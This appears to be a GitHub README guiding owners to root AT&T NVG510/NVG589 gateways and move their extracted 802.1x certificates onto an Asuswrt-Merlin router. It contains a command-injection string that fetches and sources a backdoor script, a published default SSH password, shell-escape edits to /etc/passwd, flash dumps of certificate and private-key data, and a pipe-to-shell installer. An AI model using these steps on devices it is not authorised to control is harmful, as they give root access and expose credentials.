/att

Using Asuswrt-Merlin to bypass AT&T's residential gateway

Primary LanguageShellMIT LicenseMIT

BypassAttRG

Using Asuswrt-Merlin to bypass AT&T's residential gateway. (rt-ac68u <--> BGW210 <--> ONT)
This method only requires Asuswrt-Merlin. No pfSense, or netgraph, or ubiquiti devices, or dumb switch needed.
I only tested with rt-ac68u, but the method should work for all Asuswrt-Merlin based wireless routers (Please let me know if it doesn't).
Now, the home router connects optical network terminal(ONT) directly. You should setup the firewall wisely.

Menu

Prerequisites

  • Python 3 for the local http server. There are many alternatives(e.g. mobaxterm).
  • Basic knowledge of POSIX commands (cd, mkdir, wget, etc.).
  • A NVG510 or NVG589

Back to menu

Extract Certificates

The certificates extracted from both NVG510 and NVG589 work, however NVG510 costs less and is easier to root.

NVG510

Rooting

Credit: earlz

  • Downgrade firmware to 9.0.6h2d30 if necessary. Known vulnerable firmwares are:
    • NVG510 9.0.6h2d30
    • NVG510 9.0.6h2d21
    • NVG510 9.0.6h048
  • Follow this guide Rooting The NVG510 from the WebUI.
    If NVG510 has no connection to internet, you may want to setup a local http server for NVG510 to download the script
    • Download http://earlz.net/static/backdoor.nvg510.sh to your local machine
    • Use Python to setup a simple http server. python -m http.server or python -m SimpleHTTPServer for Python2
    • In the page source of the ATT firmware update page http://192.168.1.254/cgi-bin/update.ha look for the word nonce and copy the value shown in quotes. This value changes every time the page is loaded! Example: 815a0aaa0000176012db85d7d7cac9b31e749a44b6551d02
    • In the text box on the earlz control2 page, change the command to errrr && wget http://YOUR_LOCAL_IP:8000/backdoor.nvg510.sh -O /tmp/backdoor.sh && source /tmp/backdoor.sh && errr
  • Login telnet 192.168.1.254 28. The username is admin and the password is your modem's access code written on the label of the modem
  • Once connected, type ! to switch to a root shell

Extract Certificates

  • Download busybox-mips to your local device.
  • Start Python http server. python -m http.server or python -m SimpleHTTPServer for Python2
  • In NVG510, wget https://YOUR_LOCAL_IP:8000/busybox-mips -O /tmp/busybox
  • chmod +x /tmp/busybox
  • /tmp/busybox dd if=/dev/mtdblock4 of=/tmp/mfg.dat bs=1k
  • mkdir /tmp/images
  • mount -o blind /tmp/images /www/att/images
  • cp /tmp/mfg.dat /www/att/images
  • cd /tmp
  • tar cf cert.tar /etc/rootcert/
  • cp cert.tar /www/att/images
  • Download http://192.168.1.254/images/mfg.dat and http://192.168.1.254/images/cert.tar to your local device

NVG589

Rooting

Credit: nomotion

  • If your firmware version <= 9.1.0h12d15_1.1, the following method may work for you. (I didn't test this method.)
    A complete bricking guide for Motorola/Arris NVG589.
  • Otherwise, downgrade(upgrade) to 9.2.2h0d83.
  • Reset NVG589 and ssh remotessh@192.168.1.254 (password:5SaP9I26)
    • If ssh is not enabled at this time, upgrade to 9.2.2h4d16 with ONT interface connected to AT&T's ONT.
    • Wait a bit, AT&T may start upgrade your NVG589's firmware.
    • When you see it is upgrading (power LED turns amber, and other LEDs are off), disconnect ONT cable.
    • Downgrade back to 9.2.2h0d83.
    • Now ssh should be enabled. Please let me know if you find an easier and simpler method.
  • In NVG589, run the following commands in order. (Credit: samlii@dslreports) 
    ping -c 1 192.168.1.254;echo /bin/nsh >>/etc/shells
ping -c 1 192.168.1.254;echo /bin/sh >>/etc/shells
ping -c 1 192.168.1.254;sed -i 's/cshell/nsh/g' /etc/passwd
  • Exit exit and shh back ssh remotessh@192.168.1.254 (password:5SaP9I26)
  • Type !. It switches to root shell.

Extract Certificates

  • In NVG589, run the following commands in order. Make sure you are in root shell. 
    mount mtd:mfg -t jffs2 /mfg && cp /mfg/mfg.dat /tmp/ && umount /mfg
cd /tmp
tar cf cert.tar /etc/rootcert/
cp cert.tar /www/att/images
cp /tmp/mfg.dat /www/att/images
  • Download http://192.168.1.254/images/mfg.dat and http://192.168.1.254/images/cert.tar to your local device.

BGW210

Credit: Streiw

Back to menu

Configuring 802.1x authentication

Decode Credentials

Credit: devicelocksmith

  • Download decoder v1.0.4: win, linux, mac
  • Copy mfg.dat, unzip cert.tar to the same location as mfg_dat_decode.
  • Run mfg_dat_decode. You should get a file like this: EAP-TLS_8021x_XXXX.

Update wpa_supplicant in Asuswrt-Merlin

I cannot use the build-in wpa_supplicant v0.6 in Asuswrt-Merlin to achieve my goal, so I compiled the wpa_supplicant v2.7 from Entware repository. Here I provide the necessary binary files. If you are working on a different model, you may need to compile wpa_supplicant from the source. check this.

  • Start python http server. python -m http.server
  • ssh to your router. (You need to enable ssh in the web GUI.)
  • Download the packages and unzip it. wget https://raw.githubusercontent.com/bypassrg/att/master/packages.tar.gz && tar -xzf packages.tar.gz
  • Download EAP-TLS_8021x_XXXX file from your local http server. wget https://YOUR_LOCAL_IP:8000/EAP-TLS_8021x_XXXX.tar.gz
    • Unzip and copy files to /jffs/EAP. mkdir /jffs/EAP && tar xzf EAP-TLS_8021x_XXXX.tar.gz -C /jffs/EAP
    • Modify wpa_supplicant.conf. Set *.pem to the absolute path. 
      ca_cert="/jffs/EAP/CA_XXXX.pem"
client_cert="/jffs/EAP/Client_XXXX.pem"
private_key="/jffs/EAP/PrivateKey_PKCS1_XXXX.pem"
  • Install Entware in your router.
    • Install in the usb drive. Entware
    • Install in jffs. Run this script: entware_jffs.sh
      wget -O - https://raw.githubusercontent.com/bypassrg/att/master/entware_jffs.sh |sh
      • Check your router's architecture uname -rm. If you are not using armv7, you must use the correct Entware installation script.
      • Deploying Entware
      • Replace the URL in entware_jffs.sh accordingly.
  • Install wpa_supplicant and dependencies. 
    opkg update
opkg install libubox
echo -e "\ndest opt /opt" >> /opt/etc/opkg.conf
opkg install -d opt libubus_2018-10-06-221ce7e7-1_armv7-2.6.ipk
opkg install -d opt hostapd-common_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
opkg install -d opt wpa-supplicant_2018-12-02-c2c6c01b-6_armv7-2.6.ipk
opkg install fake-hwclock
echo -e "\n/opt/usr/sbin/wpa_supplicant -s -B -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf" >> /opt/etc/init.d/rc.unslung

Configure Asuswrt-Merlin via web GUI

  • In WAN tab, set MAC Address to identity value which you can find in wpa_supplicant.conf.
  • Enable AiProtection.
    • I guess this sets VLAN tag to the network traffic, so we don't need pfSense or netgraph.
  • IPv6: set Connection type to Native

Debug

  • If it is the first time to use the certificates, it takes several rounds of authentication. Just wait.
  • check /tmp/syslog.log in the router.
  • Manually start wpa_supplicant with debug option.
    /opt/usr/sbin/wpa_supplicant -dd -Dwired -ieth0 -c/jffs/EAP/wpa_supplicant.conf

Miscellaneous

Compile Entware packages from source

Some useful links

FAQ

  1. Q: Slow Speed: The speed doesn't reach to the speed that I subscribed to.
    A: Please make sure the NAT acceleration is enabled. (Web GUI -> Tools-> HW acceleration). If it says incompatible with, you need to turn off some services.

To-dos

  • Cross compile wpa_supplicant, so we don't need to install Entware.
  • Ask Merlin to update wpa_supplicant.
  • Try to use Openwrt/ddwrt to bypass AT&T's RG.
  • Write a doc for compiling Entware packages from the source.

Donation

  • Bitcoin: 18hUjgNARRKWXr7hG9n62pWscZ4862TL6Q

Back to menu

Credits & References

Back to menu